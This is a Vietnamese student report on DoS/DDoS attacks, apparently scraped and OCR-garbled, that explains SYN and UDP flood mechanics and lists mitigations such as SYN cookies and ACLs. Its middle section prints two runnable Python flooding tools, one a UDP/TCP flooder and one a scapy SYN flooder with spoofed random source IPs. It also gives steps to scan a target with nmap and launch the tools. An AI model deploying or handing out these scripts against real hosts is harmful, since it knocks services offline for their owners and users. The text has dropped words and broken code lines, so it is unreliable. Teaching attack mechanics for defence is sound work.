ba danh tiếng liệu bị đánh cắp việc nghi ngờ tổ chức điều không tránh khỏi, ảnh hưởng đến danh tiếng tổ chức nhiều 1.1.3 Đối tượng công mạng Là đối tượng sử dụng kỹ thuật mạng để dị tìm lỗ hổng bảo mật hệ thống để thực xâm nhập chiếm đoạt thông tin bất hợp pháp Các đối tượng công mạng: Hacker: Xâm nhập vào mạng trái phép cách sử dụng công cụ phá mật khai thác điểm yếu hệ thống Masquerader: Giả mạo thông tin, địa IP, tên miền, định danh người dùng… Eavesdropping: Là đối tượng nghe trộm thông tin mạng để lấy cắp thông tin 1.1.3 Các lỗ hổng bảo mật phương thức công mạng - Các loại lỗ hổng bảo mật: Có thể phân theo cấp độ Lỗ hổng loại A: Cảnh báo nguy hiểm cho phép người ngồi hệ thống truy cập hợp pháp vào hệ thống dẫn đến phá hủy hệ thống Những lỗ hổng có sẵn phần mềm mà người quản trị không nhận biết Lỗ hổng loại B: Mức độ nguy hiểm trung bình thường có ứng dụng hệ thống Lỗ hổng cho phép người dùng nội chiếm quyền cao hay truy cập không hợp pháp Lỗ hổng loại C: Mức độ nguy hiểm thấp ảnh hưởng tới chất lượng dịch vụ, ngưng trệ gián đoạn hệ thống không phá hỏng liệu đoạt quyền truy cập - Các hình thức cơng mạng phổ biến 2020 SQL Injection Attack: Cuộc công SQL injection trở thành vấn đề phổ biến trang web dựa sở liệu Các công xảy truy vấn SQL thực thi tội phạm mạng cấp cho sở liệu, chuyển từ máy khách đến máy chủ thông qua liệu đầu vào Lệnh SQL đưa vào đầu vào mặt phẳng liệu, thường thay mật thơng tin đăng nhập Điều cho phép tội phạm mạng chạy lệnh SQL xác định trước riêng chúng Khi công SQL injection thành công, thông tin nhạy cảm bị đọc, bị đánh cắp, sửa đổi, chèn, cập nhật xóa Những kẻ cơng mạng thực thi quy trình quản trị, tắt máy, sở liệu; khôi phục nội dung từ tệp định nào; chí lệnh cho hệ điều hành Phishing Spear Phishing Attacks: Một công lừa đảo địi hỏi tội phạm mạng gửi email từ nguồn đáng tin cậy Mục đích kiểu công lấy thông tin nhạy cảm người tác động họ làm điều Chẳng hạn, có tệp đính kèm tải phần mềm độc hại xuống thiết bị mở Ngồi ra, cung cấp liên kết đến trang web giả mạo để thuyết phục cung cấp thơng tin họ lừa họ tải xuống phần mềm độc hại Spear phishing nhắm mục tiêu nhiều Những công yêu cầu kẻ công tiến hành nghiên cứu mục tiêu chúng, để chúng tạo email cá nhân phù hợp Điều làm cho việc chống lừa đảo giáo khó chống lại Ví dụ: trường “từ” email giả mạo, khiến người nhận tin thư từ người mà họ biết; email giả mạo từ chủ nhân người, yêu cầu cấp tiền Một kỹ thuật lừa đảo phổ biến khác chép trang web hợp pháp, lừa người nhập thơng tin đăng nhập thông tin cá nhân họ Phần mềm độc hại: Là phần mềm không mong muốn cài đặt hệ thống thiết bị bạn mà bạn không cho phép Phần mềm độc hại thường xâm nhập vào hệ thống cách gắn vào mã xác thực lan truyền Nó ẩn ứng dụng tự nhân qua internet (hệ thống trình lây nhiễm ghi khởi động, virus macro, trình lây nhiễm tệp, trojan, virus ẩn, bom logic, ransomware, phần mềm gián điệp, phần mềm quảng cáo, ) Botnet: Mạng botnet bao gồm máy tính thiết bị cá nhân hợp tác để đạt nhiệm vụ cụ thể Gọi “botnet” chương trình này, cịn gọi bot rô bốt, tồn mạng thiết bị Botnet tội phạm mạng sử dụng để thúc đẩy loạt công mạng Chúng giúp kẻ cơng mạng tạo điều kiện cho Giao thức điều khiển truyền TCP (Transmission Control Protocol) Là giao thức truyền tải, có nghĩa định cách liệu gửi nhận Tiêu đề TCP bao gồm phần liệu gói sử dụng TCP / IP Trước truyền liệu, TCP mở kết nối với người nhận TCP đảm bảo tất gói đến theo thứ tự trình truyền bắt đầu Thơng qua TCP, người nhận xác nhận nhận gói liệu đến Các gói bị thiếu gửi lại khơng nhận Hình Giao thức truyền TCP Mối quan hệ TCP / IP tương tự việc gửi cho thơng điệp viết câu đố qua thư Thông điệp viết câu đố chia thành nhiều mảnh Sau đó, mảnh di chuyển qua tuyến đường bưu khác nhau, số nhiều thời gian tuyến khác Khi mảnh ghép đến nơi sau qua đường khác chúng, mảnh ghép khơng theo thứ tự Giao thức Internet đảm bảo mảnh đến địa đích chúng Giao thức TCP coi người lắp ghép câu đố phía bên kia, người xếp mảnh ghép lại với theo thứ tự, yêu cầu gửi lại mảnh thiếu cho người gửi biết câu đố nhận TCP trì kết nối với người gửi từ trước mảnh ghép gửi đến sau mảnh ghép cuối gửi Ví dụ: Khi email gửi qua TCP, kết nối thiết lập bắt tay bước thực Đầu tiên, nguồn gửi gói SYN “yêu cầu ban đầu” đến máy chủ đích để bắt đầu đối thoại Sau đó, máy chủ đích gửi gói SYN-ACK để đồng ý với trình Cuối cùng, nguồn gửi gói ACK đến đích để xác nhận q trình, sau nội dung thơng báo gửi Thơng điệp email cuối chia thành gói trước gói gửi Internet, nơi qua loạt cổng trước đến thiết bị đích nơi nhóm gói TCP tập hợp lại thành nội dung ban đầu email Giao thức UDP (User Datagram) UDP phương pháp chuẩn hóa để truyền liệu hai máy tính mạng So với giao thức khác, UDP thực trình theo cách đơn giản: gửi gói (đơn vị truyền liệu) trực tiếp đến máy tính mục tiêu mà không cần thiết lập kết nối trước, cho biết thứ tự gói nói kiểm tra xem chúng có đến dự định hay khơng (Các gói UDP gọi 'datagram') Hình Giao thức truyền UDP Vì UDP khơng u cầu “Hand shake”- (yêu cầu bắt tay) kiểm tra xem liệu có đến cách hay khơng, truyền liệu nhanh nhiều so với TCP Tuy nhiên, tốc độ tạo đánh đổi Nếu sơ đồ UDP bị trình truyền tải, khơng gửi lại Do đó, ứng dụng sử dụng UDP phải có khả chịu lỗi, mát trùng lặp Về mặt kỹ thuật, việc gói khơng phải lỗ hổng UDP , cách xây dựng Internet Hầu hết định tuyến mạng không thực việc xếp gói xác nhận đến theo thiết kế, làm yêu cầu lượng nhớ bổ sung khó khả thi 2.2 Cơ chế hoạt động hình thức cơng SYN Flood Trong điều kiện bình thường: Kết nối TCP thể ba trình riêng biệt để tạo kết nối Đầu tiên, máy khách gửi gói SYN đến máy chủ để bắt đầu kết nối Sau đó, máy chủ phản hồi gói tin ban đầu gói SYN/ACK, để xác nhận giao tiếp Cuối cùng, máy khách trả gói ACK để xác nhận việc nhận gói từ máy chủ Sau hoàn thành chuỗi gửi nhận gói tin này, kết nối TCP mở gửi nhận liệu Để tạo từ chối dịch vụ: Kẻ công khai thác bước sau nhận gói SYN ban đầu, máy chủ phản hồi lại nhiều gói SYN /ACK đợi bước cuối trình bắt tay Đây cách hoạt động: Kẻ cơng gửi lượng lớn gói SYN đến máy chủ nhắm mục tiêu, thường địa IP giả mạo Sau đó, máy chủ trả lời yêu cầu kết nối để lại cổng mở sẵn sàng nhận phản hồi Trong máy chủ đợi gói ACK cuối cùng, gói khơng đến, kẻ cơng tiếp tục gửi thêm gói SYN Sự xuất gói SYN khiến máy chủ tạm thời trì kết nối cổng mở khoảng thời gian định tất cổng có sẵn sử dụng, máy chủ khơng thể hoạt động bình thường Trong mạng, máy chủ mở kết nối máy phía bên kết nối khơng, kết nối coi nửa mở Trong kiểu công DDOS này, máy chủ nhắm mục tiêu liên tục để lại kết nối mở chờ kết nối hết thời gian chờ trước cổng hoạt động trở lại Kiểu cơng coi “tấn cơng nửa mở” Hình Cơ chế cơng SYN-Flood SYN Flood xảy theo ba cách khác Tấn công trực tiếp: Một công SYN mà địa IP không bị giả mạo gọi công trực tiếp Trong cơng này, kẻ cơng hồn tồn khơng che địa IP họ Do kẻ công sử dụng thiết bị nguồn có địa IP thực để tạo công, kẻ công dễ bị phát giảm thiểu Để tạo trạng thái nửa mở máy nhắm mục tiêu, tin tặc ngăn không cho máy họ phản hồi gói SYN-ACK máy chủ Điều thường đạt cách sử dụng tường lửa với quy tắc ngăn gói gửi gói SYN cách lọc gói SYN-ACK đến trước chúng đến máy người dùng bị nhiễm mã độc Trong thực tế, phương pháp sử dụng (nếu có), việc giảm thiểu đơn giản - cần chặn địa IP hệ thống độc hại Nếu kẻ công sử dụng mạng botnet chẳng hạn botnet Mirai, chúng không quan tâm đến việc che giấu IP thiết bị bị nhiễm Tấn cơng giả mạo: Người dùng độc hại giả mạo địa IP gói SYN mà họ gửi để ngăn cản nỗ lực giảm thiểu khiến danh tính họ khó bị phát Mặc dù gói tin bị giả mạo, gói tin truy ngược trở lại nguồn chúng Thật khó để làm công việc không thể, đặc biệt nhà cung cấp dịch vụ Internet (ISP) sẵn sàng giúp đỡ Tấn công phân tán (DDOS): Nếu công tạo mạng botnet khả theo dõi cơng trở lại nguồn thấp Đối với mức độ xáo trộn bổ sung, kẻ cơng có thiết bị phân tán giả mạo địa IP mà từ gửi gói tin Nếu kẻ công sử dụng mạng botnet chẳng hạn botnet Mirai, chúng thường không quan tâm đến việc che giấu IP thiết bị bị nhiễm Bằng cách sử dụng công SYN Flood, kẻ xấu cố gắng tạo từ chối dịch vụ thiết bị dịch vụ mục tiêu có lưu lượng truy cập đáng kể so với cơng DDOS khác Thay công theo khối lượng, nhằm làm bão hòa sở hạ tầng mạng xung quanh mục tiêu, công SYN cần lớn lượng tồn đọng có sẵn hệ điều hành mục tiêu Nếu kẻ cơng xác định kích thước tồn đọng kết nối mở trước hết thời gian, kẻ cơng nhắm mục tiêu thơng số xác cần thiết để vơ hiệu hóa hệ thống, giảm tổng lưu lượng xuống mức tối thiểu cần thiết để tạo từ chối dịch vụ 2.3 Cơ chế hoạt động hình thức cơng UDP Flood UDP Flood hoạt động chủ yếu cách khai thác bước mà máy chủ thực phản hồi gói UDP gửi đến cổng nó.Trong điều kiện bình thường, máy chủ nhận gói UDP cổng cụ thể, trải qua hai bước để phản hồi: B1: Trước tiên, máy chủ kiểm tra xem có chương trình chạy lắng nghe yêu cầu cổng định hay không B2: Nếu chương trình nhận gói cổng đó, máy chủ phản hồi gói ICMP (ping) để thông báo cho người gửi truy cập đích Khi gói UDP máy chủ nhận, trải qua bước để xử lý yêu cầu, sử dụng tài nguyên máy chủ trình Khi gói UDP truyền đi, gói bao gồm địa IP thiết bị nguồn Trong kiểu công DDOS , kẻ công thường không sử dụng địa IP thực chúng mà thay vào giả mạo địa IP nguồn gói UDP, cản trở vị trí thực kẻ cơng bị lộ có khả bão hịa với gói phản hồi từ mục tiêu người phục vụ Do máy chủ nhắm mục tiêu sử dụng tài nguyên để kiểm tra sau trả lời gói UDP nhận, tài nguyên mục tiêu nhanh chóng cạn kiệt nhận lượng lớn gói UDP, dẫn đến việc từ chối dịch vụ lưu lượng bình thường Hình Cơ chế cơng UDP Flood Ví dụ: Có thể hiểu chế cơng UDP- Flood theo kiểu định tuyến gọi lễ tân khách sạn Đầu tiên, lễ tân nhận điện thoại mà người gọi yêu cầu kết nối với vị khách phịng cụ thể Sau đó, lễ tân cần xem qua danh sách tất phịng để đảm bảo khách có sẵn phịng sẵn sàng nhận gọi Khi lễ tân nhận khách không nhận gọi nào, họ phải nhấc điện thoại lên nói với người gọi khách không nhận gọi Nếu tất đường dây điện thoại sáng lên đồng thời với yêu cầu tương tự họ nhanh chóng trở nên tải Phần Giải vấn đề 3.1 Phân tích yêu cầu Xây dựng chương trình, cơng cụ mơ cơng DOS/ DDOS qua giao thức UDP, TCP Lựa chọn công nghệ, ngôn ngữ Python Thực mô công vào Website làm tăng lưu lượng băng thông, từ chối dịch vụ 3.2 Xây dựng chương trình, cơng cụ DOS/DDOS 3.2.1 Chương trình cơng DOS/DDOS (source code) • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • DOS UDP Flood (UDP) #!/usr/bin/env python3 import random import socket import threading print("UDP flood attack") ip = str(input(" Host/Ip:")) port = int(input(" Port:")) choice = str(input(" UDP(y/n):")) times = int(input(" Packets per one connection:")) threads = int(input(" Threads:")) def run(): data = random._urandom(1024) i = random.choice(("[*]","[!]","[#]")) while True: try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) addr = (str(ip),int(port)) for x in range(times): s.sendto(data,addr) print(i +" Sent!!!") except: print("[!] Error!!!") def run2(): data = random._urandom(16) i = random.choice(("[*]","[!]","[#]")) while True: try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip,port)) • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • s.send(data) for x in range(times): s.send(data) print(i +" Sent!!!") except: s.close() print("[*] Error") for y in range(threads): if choice == 'y': th = threading.Thread(target = run) th.start() else: th = threading.Thread(target = run2) th.start() DDOS SYN Flood (TCP) #!/usr/bin/python3 from from from from os import system sys import stdout scapy.all import * random import randint def randomIP(): ip = ".".join(map(str, (randint(0, 255)for _ in range(4)))) return ip def randInt(): x = randint(1000, 9000) return x def SYN_Flood(dstIP, dstPort, counter): total = print("Packets are sending ") for x in range(0, counter): s_port = randInt() s_eq = randInt() w_indow = randInt() IP_Packet = IP() IP_Packet.src = randomIP() IP_Packet.dst = dstIP • • • • • • • • • • • • • • • • • • • • • • • • • TCP_Packet = TCP() TCP_Packet.sport = s_port TCP_Packet.dport = dstPort TCP_Packet.flags = "S" TCP_Packet.seq = s_eq TCP_Packet.window = w_indow send(IP_Packet/TCP_Packet, verbose=0) total += stdout.write("\nTotal packets sent: %i\n" % total) def info(): system("clear") dstIP = input("\nTarget IP : ") dstPort = input("Target Port : ") return dstIP, int(dstPort) def main(): dstIP, dstPort = info() counter = input("How many packets you want to send : ") SYN_Flood(dstIP, dstPort, int(counter)) main() 3.2.2 Các bước thực công Server • DOS UDP Flood – Quét cổng mở host nmap Hình Quét cổng Active Nmap – – Mở CMD,trỏ tới đường dẫn chưa file chạy file python Nhập target, port, số packets muốn send Hình Nhập thơng tin, lựa chọn giao thức số packets cần send • DDOS SYN Flood – Quét cổng mở host nmap – Mở CMD,trỏ tới đường dẫn chưa file chạy file python Hình Nhập thơng tin số packets cần send Phần Kết thực 4.1 Kết đạt đánh giá - Theo dõi kết Bandwidth Server bị cơng Hình Bandwidth host sau DOS UDP Flood Hình 10 Bandwidth host sau DDos - SYN Attack - Video q trình cơng : o o Demo DOS – UDP Flood : http://bit.ly/2Jv5aoA Demo DDOS – SYN Flood : http://bit.ly/3rDqfOD - Nhận xét 4.2 Các giải pháp phòng chống DOS/DDOS Để giảm thiểu công UDP Flood Hầu hết hệ điều hành giới hạn tốc độ phản hồi gói ICMP phần để phá vỡ công DDOS yêu cầu phản hồi ICMP Một hạn chế kiểu giảm thiểu q trình cơng, gói tin hợp pháp bị lọc Sử dụng hệ thống tường lửa với khả xử lý lớn để lọc chặn giới hạn số lượng UDP để ưu tiên tài nguyên cho dịch vụ khác Nếu bạn xác định địa IP máy tính thực cơng: tạo ACL (danh sách quản lý truy cập) tường lửa bạn để chặn IP này; chí chặn hồn tồn IP từ quốc gia cần thiết Để giảm thiểu công SYN Flood Tăng hàng đợi backlog: Mỗi hệ điều hành thiết bị mục tiêu có số kết nối định half-open cho phép Một phản hồi khối lượng lớn gói SYN tăng số lượng kết nối half-open tối đa mà hệ điều hành cho phép Để tăng thành công tối đa backlog, hệ thống phải trữ thêm tài nguyễn nhớ để xử lý tất yêu cầu Điểm hạn chế hệ thống khơng có đủ nhớ để xử lý kích thước backlog tồn đọng tăng lên, hiệu xuất hệ thống bị ảnh hưởng Lặp lại kết nối half-open TCP cũ: Một cách giảm thiểu liên quan đến việc ghi đè lên kết nối half-open cũ sau backlog lấp đầy Cách yêu cầu kết nối hợp pháp đầy đủ thời gian ngắn so với backlog packets SYN độc hại Điểm hạn chế cách bảo vệ đặc biệt thất bại số lượng cơng tăng lên kích thước backlog q nhỏ khơng thích hợp SYN cookies: Cách liên quan đến việc tạo cookie server Để tránh nguy kết nối backlog lấp đầy Server phản hồi yêu cầu kết nối từ packet SNY/ACK, sau loại bỏ phản hồi SYN khỏi backlog, xóa yêu cầu khỏi nhớ để port mở sẵn sàng tạo kết nối Nếu kết nối môt yêu cầu hợp pháp packet ACK cuối gửi từ client đến server, sau server xây dựng lại tiếp nhận SYN backlog Hạn chế số thơng tin kết nối TCP Cách phịng chống hình thức DDOS khác Giới hạn tốc độ: Giới hạn số lượng yêu cầu mà máy chủ chấp nhận khoảng thời gian định Công cụ lọc lưu lượng truy cập web dựa loạt quy tắc Đặt mạng đám mây lớn, phân tán máy chủ lưu lượng truy cập đến, cung cấp tài ngun tính tốn bổ sung để đáp ứng yêu cầu Sử dụng sở hạ tầng mạnh để chống lại mối đe dọa Thực thông qua cân tải (load balancer), mạng phân phối nội dung (CDN) kết hợp hai PHỤ LỤC ACL (Access Control List): Danh sách câu lệnh dùng để quản lý truy cập (vào, ra) thiết bị với hành động tương ứng cho phép (allow) cấm (deny), có chế lọc gói tin dựa thơng số header gói tin như: IP nguồn, IP đích, Port nguồn, port đích, trạng thái Load Balancing hay “Cân tải”: Khi máy chủ down xử lý, Load Balancer bổ sung Người dùng truy cập vào load balancer Tiếp tục chuyển đến máy chủ khác để thực tác vụ Dù máy chủ bị down nghẽn tất yêu cầu người dùng giải CDN (Content Delivery Network) hệ thống nhiều máy chủ đặt phân tán nhiều vị trí địa lý khác nhau, có nhiệm vụ chép lưu trữ nội dung bên website để người dùng truy cập vào website tải nội dung từ máy chủ CDN gần với DANH MỤC TÀI LIỆU THAM KHẢO Tham khảo từ nguồn tài liệu khác mạng: https://www.cloudflare.com/ https://anninhmang.net/ https://www.digitalattackmap.com/ https://www.google.com ... truy cập đến mạng nạn nhân Các loại hình cơng DOS Các loại hình cơng DDOS Tấn công tràn đệm Tấn công Volumetric Tấn công Ping of Death ICMP flood Tấn công Fragmentation Attack Tấn công Teardrop... Trong công DDOS, nhiều bot sử dụng với công cụ sử dụng để công lúc công DOS Các công DOS dễ theo dõi Các cơng DDOS khó theo dõi Lưu lượng truy cập công Các cơng DDOS cho phép kẻ DOS so với DDOS công. .. DOS /DDOS: Ở tìm hiểu chi tiết chế công mô công DOS /DDOS 1.2 Giới thiệu cách thức công DOS /DDOS 1.2.1 Các khái niệm công DOS /DDOS DOS (Denial Of Service): Dịch tiếng Việt từ chối dịch vụ Tấn công